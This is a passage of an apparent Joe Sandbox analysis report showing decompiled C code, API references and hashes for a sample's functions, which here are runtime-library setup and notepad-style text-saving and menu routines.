                                                    			E00402CFD(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00402C41(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                                                    0x00402d02
                                                    0x00402d04
                                                    0x00402d07
                                                    0x00402d0a
                                                    0x00402d13

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __fsopen
                                                    • String ID:
                                                    • API String ID: 3646066109-0
                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                    • Instruction ID: 6041eead832d21979fe0553fc824e3670ba7a7198f6c76b7fdd2994de366a709
                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                    • Instruction Fuzzy Hash: 4BC09B7244410C77DF111943DC06E4A3F1997C0764F444021FF5C191B1A5B7D5619589
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040654D Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 167 40654d-406555 RtlEncodePointer
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000,004039EB,004134D0,00000314,00000000,?,?,?,?,?,00405EE5,004134D0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040654F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: fae89ea35d57fb06e557026358e85d7186834b62cbc634cb0163fe8b8d14604e
                                                    • Instruction ID: 65fb7cb7dd4ae58d3eda050b9bb07b1799a91b006e79683809614fcc7f3fc0f8
                                                    • Opcode Fuzzy Hash: fae89ea35d57fb06e557026358e85d7186834b62cbc634cb0163fe8b8d14604e
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00401204 Relevance: 40.7, APIs: 27, Instructions: 190memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00401204(WCHAR* _a4, int _a8) {
				int _v8;
				int _v12;
				int _v16;
				short* _v20;
				long _v24;
				void* _t40;
				void* _t44;
				void* _t63;
				long _t65;
				char* _t67;
				short* _t77;
				long _t79;
				char* _t81;
				void* _t83;
				int _t85;
				int _t86;
				void* _t87;
				int _t90;

				_t1 = GetWindowTextLengthW( *0x4140ec) + 1; // 0x1
				_t85 = _t1;
				_t3 = _t85 + 2; // 0x3
				_t40 = HeapAlloc(GetProcessHeap(), 0, _t85 + _t3);
				_v8 = _t40;
				if(_t40 != 0) {
					 *_t40 = 0xfeff;
					_t5 = GetWindowTextW( *0x4140ec, _t40 + 2, _t85) + 1; // 0x1
					_t86 = _t5;
					_t44 = _a8 - 1;
					if(_t44 == 0) {
						L16:
						_v12 = _t86 + _t86;
						_a8 = _v8;
						L17:
						_t87 = CreateFileW(_a4, 0x40000000, 2, 0, 4, 0x80, 0);
						if(_t87 != 0xffffffff) {
							if(WriteFile(_t87, _a8, _v12,  &_v24, 0) != 0) {
								SetEndOfFile(_t87);
								CloseHandle(_t87);
								HeapFree(GetProcessHeap(), 0, _a8);
								SendMessageW( *0x4140ec, 0xb9, 0, 0);
								return 0;
							}
							E00401000();
							CloseHandle(_t87);
							L19:
							HeapFree(GetProcessHeap(), 0, _a8);
							L2:
							return 1;
						}
						E00401000();
						goto L19;
					}
					_t63 = _t44 - 1;
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 1) {
						_t65 = WideCharToMultiByte(0xfde9, 0, _v8, _t86, 0, 0, 0, 0);
						_v12 = _t65;
						_t67 = HeapAlloc(GetProcessHeap(), 0, _t65);
						_a8 = _t67;
						if(_t67 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t86, _t67, _v12, 0, 0);
							L15:
							HeapFree(GetProcessHeap(), 0, _v8);
							goto L17;
						}
						L12:
						E00401000();
						L13:
						HeapFree(GetProcessHeap(), 0, _v8);
						return 1;
					}
					_t90 = _t86 - 1;
					_t77 = _v8 + 2;
					_v16 = _t90;
					_a8 = 0;
					_v20 = _t77;
					WideCharToMultiByte(0, 0x400, _t77, _t90, 0, 0, 0,  &_a8);
					if(_a8 == 0) {
						L9:
						_t79 = WideCharToMultiByte(0, 0, _v20, _v16, 0, 0, 0, 0);
						_v12 = _t79;
						_t81 = HeapAlloc(GetProcessHeap(), 0, _t79);
						_a8 = _t81;
						if(_t81 == 0) {
							goto L12;
						}
						WideCharToMultiByte(0, 0, _v20, _v16, _t81, _v12, 0, 0);
						goto L15;
					}
					_t83 = E0040117A();
					if(_t83 != 2) {
						goto L9;
					}
					_push(_t83);
					_pop(1);
					goto L13;
				}
				E00401000();
				goto L2;
			}





















                                                    0x0040121f
                                                    0x0040121f
                                                    0x00401222
                                                    0x0040122d
                                                    0x00401233
                                                    0x00401238
                                                    0x0040124c
                                                    0x00401260
                                                    0x00401260
                                                    0x00401266
                                                    0x00401267
                                                    0x00401350
                                                    0x00401353
                                                    0x00401359
                                                    0x0040135c
                                                    0x00401375
                                                    0x0040137a
                                                    0x004013a7
                                                    0x004013b8
                                                    0x004013bf
                                                    0x004013cc
                                                    0x004013df
                                                    0x00000000
                                                    0x004013e5
                                                    0x004013a9
                                                    0x004013af
                                                    0x00401381
                                                    0x00401388
                                                    0x0040123f
                                                    0x00000000
                                                    0x00401241
                                                    0x0040137c
                                                    0x00000000
                                                    0x0040137c
                                                    0x0040126d
                                                    0x0040126e
                                                    0x00000000
                                                    0x00000000
                                                    0x00401275
                                                    0x004012f4
                                                    0x004012fc
                                                    0x00401302
                                                    0x00401308
                                                    0x0040130d
                                                    0x0040133b
                                                    0x00401341
                                                    0x00401348
                                                    0x00000000
                                                    0x00401348
                                                    0x0040130f
                                                    0x00401312
                                                    0x00401317
                                                    0x0040131e
                                                    0x00000000
                                                    0x00401324
                                                    0x00401281
                                                    0x00401283
                                                    0x0040128c
                                                    0x00401296
                                                    0x00401299
                                                    0x0040129c
                                                    0x004012a1
                                                    0x004012b1
                                                    0x004012bd
                                                    0x004012c1
                                                    0x004012c7
                                                    0x004012cd
                                                    0x004012d2
                                                    0x00000000
                                                    0x00000000
                                                    0x004012e2
                                                    0x00000000
                                                    0x004012e2
                                                    0x004012a3
                                                    0x004012ab
                                                    0x00000000
                                                    0x00000000
                                                    0x004012ad
                                                    0x004012ae
                                                    0x00000000
                                                    0x004012ae
                                                    0x0040123a
                                                    0x00000000

                                                    APIs
                                                    • GetWindowTextLengthW.USER32 ref: 00401213
                                                    • GetProcessHeap.KERNEL32(00000000,00000003), ref: 0040122A
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040122D
                                                    • GetWindowTextW.USER32 ref: 0040125A
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000000,00000000,00000000,00000000,?), ref: 0040129C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040131B
                                                    • HeapFree.KERNEL32(00000000), ref: 0040131E
                                                      • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 0040100B
                                                      • Part of subcall function 00401000: LoadStringW.USER32(00000171,?,00000000), ref: 0040102C
                                                      • Part of subcall function 00401000: FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,?,00000000,00000000), ref: 00401040
                                                      • Part of subcall function 00401000: MessageBoxW.USER32(00000000,?,?,00000010), ref: 00401053
                                                      • Part of subcall function 00401000: LocalFree.KERNEL32(?), ref: 0040105C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeMessageProcessTextWindow$AllocByteCharErrorFormatLastLengthLoadLocalMultiStringWide
                                                    • String ID:
                                                    • API String ID: 4190753596-0
                                                    • Opcode ID: 050d67a7b076de028db3ad31fa817dcdec4babaa7f8bd037e2ed92ad5480cf96
                                                    • Instruction ID: c2672185c8641e0bea950973c587c803f5cb949ec545c0a367909676333851aa
                                                    • Opcode Fuzzy Hash: 050d67a7b076de028db3ad31fa817dcdec4babaa7f8bd037e2ed92ad5480cf96
                                                    • Instruction Fuzzy Hash: 72514E75901128BFDB216FA29D8CDAF7F6CEF09364B108831FA15F6160C6788911DBB9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403D30 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00403D30(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x41267c; // 0xb8fde5d4
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x413ea8 = _t6;
				 *0x413ea4 = _t22;
				 *0x413ea0 = _t25;
				 *0x413e9c = _t21;
				 *0x413e98 = _t27;
				 *0x413e94 = _t26;
				 *0x413ec0 = ss;
				 *0x413eb4 = cs;
				 *0x413e90 = ds;
				 *0x413e8c = es;
				 *0x413e88 = fs;
				 *0x413e84 = gs;
				asm("pushfd");
				_pop( *0x413eb8);
				 *0x413eac =  *_t31;
				 *0x413eb0 = _v0;
				 *0x413ebc =  &_a4;
				 *0x413df8 = 0x10001;
				_t11 =  *0x413eb0; // 0x0
				 *0x413dac = _t11;
				 *0x413da0 = 0xc0000409;
				 *0x413da4 = 1;
				_t12 =  *0x41267c; // 0xb8fde5d4
				_v812 = _t12;
				_t13 =  *0x412680; // 0x47021a2b
				_v808 = _t13;
				 *0x413df0 = IsDebuggerPresent();
				_push(1);
				E0040736F(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x40f72c);
				if( *0x413df0 == 0) {
					_push(1);
					E0040736F(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                    0x00403d30
                                                    0x00403d30
                                                    0x00403d30
                                                    0x00403d30
                                                    0x00403d30
                                                    0x00403d30
                                                    0x00403d30
                                                    0x00403d36
                                                    0x00403d38
                                                    0x00403d38
                                                    0x004087e7
                                                    0x004087ec
                                                    0x004087f2
                                                    0x004087f8
                                                    0x004087fe
                                                    0x00408804
                                                    0x0040880a
                                                    0x00408811
                                                    0x00408818
                                                    0x0040881f
                                                    0x00408826
                                                    0x0040882d
                                                    0x00408834
                                                    0x00408835
                                                    0x0040883e
                                                    0x00408846
                                                    0x0040884e
                                                    0x00408859
                                                    0x00408863
                                                    0x00408868
                                                    0x0040886d
                                                    0x00408877
                                                    0x00408881
                                                    0x00408886
                                                    0x0040888c
                                                    0x00408891
                                                    0x0040889d
                                                    0x004088a2
                                                    0x004088a4
                                                    0x004088ac
                                                    0x004088b7
                                                    0x004088c4
                                                    0x004088c6
                                                    0x004088c8
                                                    0x004088cd
                                                    0x004088e1

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00408897
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004088AC
                                                    • UnhandledExceptionFilter.KERNEL32(0040F72C), ref: 004088B7
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004088D3
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004088DA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 15248ddd6865677df132cfda911f9ebb9152b5c15e5e676a6f6d374392506863
                                                    • Instruction ID: 568c906df5eaad88f6c19b34c629e456847ac6f2a536e36026372bb0c803ea31
                                                    • Opcode Fuzzy Hash: 15248ddd6865677df132cfda911f9ebb9152b5c15e5e676a6f6d374392506863
                                                    • Instruction Fuzzy Hash: 6921BEB5801304DFD741DF25FE89A857BB4BB08316F50847AE809A73A0E7B49A95CF0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401000 Relevance: 7.5, APIs: 5, Instructions: 37windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401000() {
				short _v8;
				short _v520;
				long _t6;
				long _t14;

				_t6 = GetLastError();
				_t14 = _t6;
				if(_t14 != 0) {
					LoadStringW( *0x4140e0, 0x171,  &_v520, 0);
					FormatMessageW(0x1100, 0, _t14, 0,  &_v8, 0, 0);
					MessageBoxW(0, _v8,  &_v520, 0x10);
					return LocalFree(_v8);
				}
				return _t6;
			}







                                                    0x0040100b
                                                    0x00401011
                                                    0x00401017
                                                    0x0040102c
                                                    0x00401040
                                                    0x00401053
                                                    0x00000000
                                                    0x0040105c
                                                    0x00401065

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 0040100B
                                                    • LoadStringW.USER32(00000171,?,00000000), ref: 0040102C
                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,?,00000000,00000000), ref: 00401040
                                                    • MessageBoxW.USER32(00000000,?,?,00000010), ref: 00401053
                                                    • LocalFree.KERNEL32(?), ref: 0040105C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Message$ErrorFormatFreeLastLoadLocalString
                                                    • String ID:
                                                    • API String ID: 257693712-0
                                                    • Opcode ID: c11061b83e4b1ab5117661a5311a83b7fc6ec648ba7021194be05d3d3ce693d1
                                                    • Instruction ID: 661e41b785986f46849df8d9e15ddf422ce3e07e864736ce861fe63c0bd9a861
                                                    • Opcode Fuzzy Hash: c11061b83e4b1ab5117661a5311a83b7fc6ec648ba7021194be05d3d3ce693d1
                                                    • Instruction Fuzzy Hash: BBF09ABA501128BBDB21ABA2EE0DDDF7F3CEB89B51F004070F611B10A0C6700A50DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405D74 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405D74() {

				SetUnhandledExceptionFilter(E00405D32);
				return 0;
			}



                                                    0x00405d79
                                                    0x00405d81

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00005D32), ref: 00405D79
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: a10142c10c79f299bd256d8079b25f0ce1022aaff4acd59740f4c1dcab283903
                                                    • Instruction ID: 0c6c93751e1d5df5f4e2b4d4cae70f620ea2acd40734573ec7cdc15b68657cbc
                                                    • Opcode Fuzzy Hash: a10142c10c79f299bd256d8079b25f0ce1022aaff4acd59740f4c1dcab283903
                                                    • Instruction Fuzzy Hash: B19002F469150446D7041B715D0D60629949E487127654C767041E8194EA7840505919
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406846 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E00406846(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x413c00 = GetProcAddress(_t35, "FlsAlloc");
					 *0x413c04 = GetProcAddress(_t35, "FlsGetValue");
					 *0x413c08 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x413c00;
					_t39 = TlsSetValue;
					 *0x413c0c = _t7;
					if( *0x413c00 == 0) {
						L6:
						 *0x413c04 = TlsGetValue;
						 *0x413c00 = E00406556;
						 *0x413c08 = _t39;
						 *0x413c0c = TlsFree;
					} else {
						__eflags =  *0x413c04;
						if( *0x413c04 == 0) {
							goto L6;
						} else {
							__eflags =  *0x413c08;
							if( *0x413c08 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x4127f4 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x413c04);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0040352A();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x413c00);
							 *0x413c00 = _t14;
							_t15 =  *_t41( *0x413c04);
							 *0x413c04 = _t15;
							_t16 =  *_t41( *0x413c08);
							 *0x413c08 = _t16;
							 *0x413c0c =  *_t41( *0x413c0c);
							_t18 = E0040822E();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00406593();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x413c00, E00406717);
								 *0x4127f0 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00407E13(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x413c08,  *0x4127f0, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E004065D0(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00406593();
					return 0;
				}
			}





















                                                    0x00406846
                                                    0x00406854
                                                    0x00406858
                                                    0x00406878
                                                    0x00406885
                                                    0x00406892
                                                    0x00406897
                                                    0x00406899
                                                    0x004068a0
                                                    0x004068a6
                                                    0x004068ab
                                                    0x004068c3
                                                    0x004068c8
                                                    0x004068d2
                                                    0x004068dc
                                                    0x004068e2
                                                    0x004068ad
                                                    0x004068ad
                                                    0x004068b4
                                                    0x00000000
                                                    0x004068b6
                                                    0x004068b6
                                                    0x004068bd
                                                    0x00000000
                                                    0x004068bf
                                                    0x004068bf
                                                    0x004068c1
                                                    0x00000000
                                                    0x00000000
                                                    0x004068c1
                                                    0x004068bd
                                                    0x004068b4
                                                    0x004068e7
                                                    0x004068ed
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004069bc
                                                    0x004069bc
                                                    0x004069bc
                                                    0x004068fb
                                                    0x00406902
                                                    0x00406904
                                                    0x00406906
                                                    0x00000000
                                                    0x0040690c
                                                    0x0040690c
                                                    0x00406917
                                                    0x0040691d
                                                    0x00406925
                                                    0x0040692a
                                                    0x00406932
                                                    0x00406937
                                                    0x0040693f
                                                    0x00406946
                                                    0x0040694b
                                                    0x00406950
                                                    0x00406952
                                                    0x004069b7
                                                    0x004069b7
                                                    0x00000000
                                                    0x00406954
                                                    0x00406954
                                                    0x00406967
                                                    0x00406969
                                                    0x0040696e
                                                    0x00406971
                                                    0x00000000
                                                    0x00406973
                                                    0x0040697f
                                                    0x00406983
                                                    0x00406985
                                                    0x00000000
                                                    0x00406987
                                                    0x00406998
                                                    0x0040699a
                                                    0x00000000
                                                    0x0040699c
                                                    0x0040699c
                                                    0x0040699e
                                                    0x0040699f
                                                    0x004069a6
                                                    0x004069ac
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b4
                                                    0x0040699a
                                                    0x00406985
                                                    0x00406971
                                                    0x00406952
                                                    0x00406906
                                                    0x004069c0
                                                    0x0040685a
                                                    0x0040685a
                                                    0x00406862
                                                    0x00406862

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00402DC7), ref: 0040684E
                                                    • __mtterm.LIBCMT ref: 0040685A
                                                      • Part of subcall function 00406593: DecodePointer.KERNEL32(00000006,004069BC,?,00402DC7), ref: 004065A4
                                                      • Part of subcall function 00406593: TlsFree.KERNEL32(00000023,004069BC,?,00402DC7), ref: 004065BE
                                                      • Part of subcall function 00406593: DeleteCriticalSection.KERNEL32(00000000,00000000,770EF3A0,?,004069BC,?,00402DC7), ref: 00408295
                                                      • Part of subcall function 00406593: _free.LIBCMT ref: 00408298
                                                      • Part of subcall function 00406593: DeleteCriticalSection.KERNEL32(00000023,770EF3A0,?,004069BC,?,00402DC7), ref: 004082BF
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00406870
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040687D
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040688A
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00406897
                                                    • TlsAlloc.KERNEL32(?,00402DC7), ref: 004068E7
                                                    • TlsSetValue.KERNEL32(00000000,?,00402DC7), ref: 00406902
                                                    • __init_pointers.LIBCMT ref: 0040690C
                                                    • EncodePointer.KERNEL32(?,00402DC7), ref: 0040691D
                                                    • EncodePointer.KERNEL32(?,00402DC7), ref: 0040692A
                                                    • EncodePointer.KERNEL32(?,00402DC7), ref: 00406937
                                                    • EncodePointer.KERNEL32(?,00402DC7), ref: 00406944
                                                    • DecodePointer.KERNEL32(00406717,?,00402DC7), ref: 00406965
                                                    • __calloc_crt.LIBCMT ref: 0040697A
                                                    • DecodePointer.KERNEL32(00000000,?,00402DC7), ref: 00406994
                                                    • GetCurrentThreadId.KERNEL32 ref: 004069A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 3698121176-3819984048
                                                    • Opcode ID: ea12f2efa01847ed68c3beba9731be10979662d3be0fa777c4418b45072991f3
                                                    • Instruction ID: a61000764c5f4214df612ce2182167ed42caa074eaa87072c51a33fc909dcdf9
                                                    • Opcode Fuzzy Hash: ea12f2efa01847ed68c3beba9731be10979662d3be0fa777c4418b45072991f3
                                                    • Instruction Fuzzy Hash: 9E315F7A800361AACB116F75ED04A967FA4EB44361B11C53BE411B76E0EF788521DF9C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401C20 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 70stringwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00401C20() {
				WCHAR* _t34;
				WCHAR* _t35;
				WCHAR* _t38;

				LoadStringW( *0x4140e0, 0x176, 0x414984, 0xff);
				_t34 = 0x414986 + lstrlenW(0x414984) * 2;
				lstrcpyW(_t34, L"*.txt");
				_t35 = _t34 + 2 + lstrlenW(_t34) * 2;
				LoadStringW( *0x4140e0, 0x175, _t35, 0xff);
				_t38 = _t35 + 2 + lstrlenW(_t35) * 2;
				lstrcpyW(_t38, L"*.*");
				 *((short*)(_t38 + 2 + lstrlenW(_t38) * 2)) = 0;
				 *0x4152cc =  *0x4152cc & 0;
				 *0x4152d0 =  *0x4152d0 & 0;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x4140e4), 0x119,  ~( *0x41415c) & 0x00000008);
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x4140e4), 0x205,  ~( *0x4140f8) & 0x00000008);
				asm("sbb eax, eax");
				return ShowWindow( *0x4140f4,  ~( *0x4140f8) & 0x00000005);
			}






                                                    0x00401c3f
                                                    0x00401c4a
                                                    0x00401c57
                                                    0x00401c65
                                                    0x00401c75
                                                    0x00401c7a
                                                    0x00401c84
                                                    0x00401c95
                                                    0x00401c9f
                                                    0x00401ca5
                                                    0x00401cad
                                                    0x00401cc7
                                                    0x00401cd0
                                                    0x00401ce4
                                                    0x00401ced
                                                    0x00401d02

                                                    APIs
                                                    • LoadStringW.USER32(00000176,00414984,000000FF,00000300), ref: 00401C3F
                                                    • lstrlenW.KERNEL32(00414984), ref: 00401C48
                                                    • lstrcpyW.KERNEL32 ref: 00401C57
                                                    • lstrlenW.KERNEL32(00000000), ref: 00401C5E
                                                    • LoadStringW.USER32(00000175,?,000000FF), ref: 00401C75
                                                    • lstrlenW.KERNEL32(?), ref: 00401C78
                                                    • lstrcpyW.KERNEL32 ref: 00401C84
                                                    • lstrlenW.KERNEL32(?), ref: 00401C8B
                                                    • GetMenu.USER32(00000119), ref: 00401CBE
                                                    • CheckMenuItem.USER32(00000000), ref: 00401CC7
                                                    • GetMenu.USER32(00000205), ref: 00401CE1
                                                    • CheckMenuItem.USER32(00000000), ref: 00401CE4
                                                    • ShowWindow.USER32(?), ref: 00401CF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
